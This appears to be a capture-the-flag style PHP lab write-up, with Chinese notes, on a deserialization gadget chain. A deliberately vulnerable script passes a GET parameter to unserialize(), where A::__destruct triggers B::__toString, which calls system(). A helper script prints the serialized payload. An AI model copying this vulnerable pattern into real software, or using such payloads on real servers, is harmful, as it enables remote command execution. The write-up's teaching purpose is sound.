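<?php
// Deliberately vulnerable lab script: a request parameter is passed straight to
// unserialize() while classes with magic methods are defined in the same file.
highlight_file(__FILE__);

/**
 * Entry gadget. __destruct() runs automatically when an instance is destroyed,
 * including an instance that unserialize() rebuilt from request data.
 */
class A
{
    /** @var mixed Restored by unserialize(), so the sender chooses its value and type. */
    public $s;

    public function __destruct()
    {
        // Concatenation converts $this->s to a string; when it holds an object,
        // PHP calls that object's __toString().
        echo "hello" . $this->s;
    }
}

/**
 * Sink gadget. __toString() runs whenever an instance is used as a string.
 */
class B
{
    /** @var mixed Restored by unserialize(), so the sender chooses its value. */
    public $cmd;

    public function __toString()
    {
        // SECURITY: command execution on a property that deserialized data controls.
        system($this->cmd);

        // __toString() must return a string; PHP 7 raises an error for the
        // original integer return value.
        return "1";
    }
}

// SECURITY: unserialize() on request data can instantiate any class defined above
// with sender-chosen property values, and their magic methods then run on their
// own. Code that is not a lab should decode untrusted input with json_decode(),
// or at least pass ['allowed_classes' => false] as the second argument.
unserialize($_GET['code']);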
__toString():当对象被当作字符串使用时自动调用。
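起点:A::__destruct() 中的 "hello".$this->s;(反序列化得到的对象被销毁时自动执行)
终点:B::__toString() 中的 system($this->cmd);
跳板:"hello".$this->s; —— 字符串拼接会把 $this->s 当作字符串使用,若 $this->s 是 B 的对象,就会触发 B::__toString()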
<?php
// Helper from the write-up: redefines the lab's two classes and prints the
// serialized form of an A object whose $s property holds a B object.
highlight_file(__FILE__);

class A
{
    public $s;

    public function __destruct()
    {
        // String concatenation invokes __toString() on an object stored in $s.
        echo 'hello' . $this->s;
    }
}

class B
{
    public $cmd;

    public function __toString()
    {
        system($this->cmd);

        return '1';
    }
}

$inner = new B();
$inner->cmd = 'dir';

$outer = new A();
$outer->s = $inner;

// serialize() records class names and property values only, never method bodies;
// the receiving side supplies the code through its own class definitions.
echo serialize($outer);

// When the script ends $outer is destroyed, so A::__destruct() also fires here and
// the command runs on the machine that generates the string.
?> O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}
执行结果如下: